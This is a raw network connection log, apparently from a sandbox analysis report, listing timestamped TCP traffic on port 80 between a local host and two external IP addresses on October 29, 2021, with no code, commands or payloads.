                                                                                                                          Oct 29, 2021 17:06:15.063828945 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063828945 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.063849926 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063873053 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063882113 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.063896894 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063927889 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064080000 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064107895 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064125061 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064130068 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064152956 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064163923 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064176083 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064198017 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064215899 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064261913 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064285040 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064305067 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064364910 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064388037 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064407110 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064410925 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064434052 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064445972 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064779043 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064804077 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064826965 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064836979 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064872026 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.064966917 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.064990997 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065012932 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065026045 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065037966 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065058947 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065077066 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065080881 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065104008 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065121889 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065128088 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065150023 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065165043 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065581083 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065608978 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065628052 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065630913 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065654039 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065673113 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065684080 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065706015 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065726995 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065737009 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065751076 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065769911 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065773010 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065812111 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065828085 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.065834045 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065855026 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.065916061 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.076491117 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.076524973 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.076553106 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.076637030 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.076682091 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.101963043 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.102003098 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.102026939 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.102056026 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118105888 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118144989 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118168116 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118190050 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118190050 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118211031 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118218899 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118233919 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118254900 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118259907 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118278027 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118299961 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118300915 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118321896 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118339062 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118343115 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118364096 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118386030 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118387938 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118407011 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118427992 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118427992 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118453026 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118469954 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118474960 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118496895 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118520975 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118520975 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118561983 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118580103 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118602037 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118638039 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118797064 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118820906 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118843079 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118860960 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118864059 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118889093 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118911028 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118913889 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118932962 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118953943 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118953943 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.118976116 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.118992090 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.119520903 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.119546890 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.119568110 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.119611025 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.119623899 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.119646072 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.119695902 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.120002985 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.120032072 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.120049000 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.120066881 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151515007 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151551962 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151572943 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151592016 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151595116 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151617050 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151623964 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151639938 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151660919 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151673079 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151681900 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151702881 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151719093 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151722908 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.151743889 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151774883 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.151910067 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.205653906 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:16.922638893 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:16.974507093 CEST8049754185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:16.974728107 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:16.974819899 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:16.977236032 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.027129889 CEST8049754185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.028925896 CEST8049754185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.052582979 CEST8049754185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.052711964 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.053363085 CEST4975480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.105031967 CEST8049754185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.199968100 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.253098011 CEST8049755185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.255572081 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.398834944 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.398870945 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.451682091 CEST8049755185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.482110023 CEST8049755185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.482296944 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.482819080 CEST4975580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:17.535466909 CEST8049755185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:17.576597929 CEST4975680192.168.2.7216.128.137.31
                                                                                                                          Oct 29, 2021 17:06:20.699826002 CEST4975680192.168.2.7216.128.137.31
                                                                                                                          Oct 29, 2021 17:06:26.700404882 CEST4975680192.168.2.7216.128.137.31
                                                                                                                          Oct 29, 2021 17:06:33.312479019 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.365031958 CEST8049771185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.365140915 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.365226984 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.365315914 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.417357922 CEST8049771185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.444222927 CEST8049771185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.444329977 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.444602966 CEST4977180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.496475935 CEST8049771185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.878119946 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.931799889 CEST8049775185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.932828903 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.932898045 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.933594942 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:33.986591101 CEST8049775185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:33.986968040 CEST8049775185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.014120102 CEST8049775185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.014214039 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.014540911 CEST4977580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.067878962 CEST8049775185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.095139980 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.148730040 CEST8049778185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.149490118 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.149869919 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.149924040 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.203408957 CEST8049778185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.230443954 CEST8049778185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.230545044 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.230586052 CEST4977880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.269330025 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.284269094 CEST8049778185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.322434902 CEST8049780185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.322871923 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.323156118 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.323163033 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.401909113 CEST8049780185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.403619051 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.403805971 CEST4978080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.434175014 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.456676006 CEST8049780185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.487843990 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.488043070 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.488084078 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.488087893 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.566710949 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.566823959 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.566886902 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.566951990 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567012072 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567063093 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.567071915 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567086935 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.567131996 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567214966 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567293882 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.567306995 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567374945 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.567485094 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.567492008 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.620773077 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620791912 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620809078 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620825052 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620841980 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620867968 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620966911 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.620979071 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.620984077 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621001959 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621018887 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621049881 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621073961 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621083975 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621100903 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621119022 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621136904 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621145964 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621154070 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621170998 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621177912 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621222019 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621232033 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621248960 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621293068 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621331930 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.621336937 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.621381998 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674529076 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674550056 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674566984 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674583912 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674609900 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674673080 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674676895 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674705982 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674757957 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674781084 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674797058 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674813032 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674837112 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674843073 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674894094 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674895048 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.674911022 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674949884 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.674985886 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675010920 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675034046 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675081015 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675097942 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675115108 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675132036 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675143003 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675148964 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675180912 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675190926 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675208092 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675219059 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675225973 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675251961 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675255060 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675272942 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675288916 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675304890 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675322056 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675331116 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675339937 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675357103 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675365925 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675374031 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675390005 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675391912 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675440073 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675451040 CEST4978180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:34.675457001 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675474882 CEST8049781185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:34.675492048 CEST8049781185.98.87.159192.168.2.7
